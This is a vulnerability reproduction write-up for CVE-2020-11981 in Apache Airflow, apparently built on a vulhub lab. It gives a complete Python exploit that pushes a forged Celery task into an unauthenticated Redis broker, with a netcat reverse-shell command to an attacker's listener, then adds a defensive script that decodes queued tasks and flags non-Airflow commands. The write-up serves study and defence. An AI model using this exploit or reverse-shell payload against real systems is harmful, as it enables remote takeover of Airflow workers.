CVE-2020-11981

I. Vulnerability information

This is the Apache Airflow Celery message broker command execution vulnerability.
Affected versions: Apache Airflow <= 1.10.10
Overview: Apache Airflow is an open-source distributed task scheduling framework. In version 1.10.10 and earlier, the Celery executor's execute_command task runs whatever argument list it receives from the broker without checking it. If an attacker can write to the Celery message broker (for example Redis or RabbitMQ), they can push a crafted task message and have the worker process execute arbitrary commands. In the vulhub environment used below, the Redis broker is reachable without a password, which is what makes the message injection possible.

II. Environment setup

Build the target environment from the vulhub image for this CVE:

docker-compose run airflow-init # initialize the database

docker-compose up -d # start the target environment

III. Reproduction steps

1. On the attacking host, create the exploit script: touch 1.py
2. Open it with vim 1.py and write the following content:

import json
import base64
import redis
import sys

# Connect to the Celery broker. The vulhub Redis listens on 6379 with no password,
# which is what lets an outsider inject tasks. sys.argv[1] is the broker address.
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True, db=0)
# Airflow's default Celery queue; the worker consumes tasks from this Redis list.
queue_name = 'default'
# A captured Celery protocol-v2 envelope for the execute_command task. Only the
# base64-encoded 'body' is replaced below; the headers (notably 'task') are kept as is.
ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ==\"}"

task_dict = json.loads(ori_str)
# The command the worker will run. Replace 'ip' with the address of your listener.
command = ['nc', 'ip', '4444', '-e', '/bin/bash']
# Celery v2 body layout: [args, kwargs, embed]. execute_command takes one argument,
# the argv list, so args is [command]. The unpatched task executes it unchecked.
body = [[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
task_dict['body'] = base64.b64encode(json.dumps(body).encode()).decode()

# Echo the command being injected.
print(' '.join(command))

# Push the forged task onto the queue; the next idle worker picks it up and runs it.
r.lpush(queue_name, json.dumps(task_dict))

3. Open a second terminal and run tcpdump -i eth0 port 4444 to watch for the callback (to actually get an interactive shell, a listener such as nc -lvnp 4444 must be waiting on that port, and the target's nc must be a build that supports -e). Go back to the first terminal and run python3 1.py <redis-host>; the target worker then connects back:
[image]
4. Change command in the script to something that shows output, for example whoami:
[image]
5. Back on the server side, run docker-compose logs airflow-worker to view the worker log, then exec into the container to confirm the command ran:
[image]
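To see the same attack from the broker's side, here is an added example (not code from this writeup, from Airflow or from vulhub) that decodes Celery protocol-v2 entries as they sit on the Redis list, the same envelope format the script above forges, and flags any execute_command task whose argument is not an airflow run invocation. The sample messages are constructed inline, including the reverse-shell payload from step 2; the allowed prefix ['airflow', 'run'], the helper names and the placeholder listener address are assumptions, chosen to mirror the kind of allow-list check a patched worker enforces.

```python
"""Audit Celery protocol-v2 messages from an Airflow broker queue.

Added example for this writeup, not Airflow or vulhub code. Sample messages are
constructed inline. ALLOWED_PREFIX is an assumption about what a legitimate
execute_command argument starts with.
"""
import base64
import json

TASK_NAME = "airflow.executors.celery_executor.execute_command"
ALLOWED_PREFIX = ["airflow", "run"]  # assumption: legitimate worker commands start like this


def build_message(command, task=TASK_NAME):
    """Build a minimal Celery v2 envelope the way the exploit script does:
    [args, kwargs, embed] is JSON-encoded, base64'd and stored in 'body'."""
    body = [[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
    return json.dumps({
        "content-encoding": "utf-8",
        "content-type": "application/json",
        "properties": {"body_encoding": "base64",
                       "delivery_info": {"routing_key": "default", "exchange": ""}},
        "headers": {"task": task, "lang": "py",
                    "id": "00000000-0000-0000-0000-000000000000"},  # constructed id
        "body": base64.b64encode(json.dumps(body).encode()).decode(),
    })


def decode_message(raw):
    """Return (task_name, args, kwargs) from one raw broker entry, or None if it
    is not a well-formed v2 task message."""
    try:
        env = json.loads(raw)
        task = env["headers"]["task"]
        if env["properties"].get("body_encoding") == "base64":
            body_bytes = base64.b64decode(env["body"])
        else:
            body_bytes = env["body"].encode()
        args, kwargs, _embed = json.loads(body_bytes)
    except (KeyError, ValueError, TypeError, IndexError):
        return None
    return task, args, kwargs


def is_allowed_command(command):
    """The allow-list check a patched worker should apply to execute_command:
    a list of strings whose first elements are the expected airflow invocation."""
    return (isinstance(command, list)
            and all(isinstance(c, str) for c in command)
            and command[:2] == ALLOWED_PREFIX)


def audit_queue(raw_messages):
    """Return one finding per execute_command message that fails the check,
    plus one per entry that cannot be decoded at all."""
    findings = []
    for idx, raw in enumerate(raw_messages):
        decoded = decode_message(raw)
        if decoded is None:
            findings.append({"index": idx, "reason": "undecodable message"})
            continue
        task, args, _kwargs = decoded
        if task != TASK_NAME:
            continue
        command = args[0] if args else None
        if not is_allowed_command(command):
            findings.append({"index": idx, "reason": "command is not an airflow run",
                             "command": command})
    return findings


# Constructed samples: a legitimate task, the writeup's reverse-shell payload
# (10.0.0.1 is a placeholder listener address), and a non-JSON entry.
BENIGN = build_message(["airflow", "run", "example_dag", "task_a", "2020-07-01T00:00:00+00:00"])
MALICIOUS = build_message(["nc", "10.0.0.1", "4444", "-e", "/bin/bash"])
GARBAGE = "not a celery message"


if __name__ == "__main__":
    for finding in audit_queue([BENIGN, MALICIOUS, GARBAGE]):
        print(finding)
```

Against a live environment, the raw entries can be pulled with redis-cli LRANGE default 0 -1 and fed to audit_queue; the same prefix check, applied inside the worker before the command is executed, is what closes the hole the script above exploits.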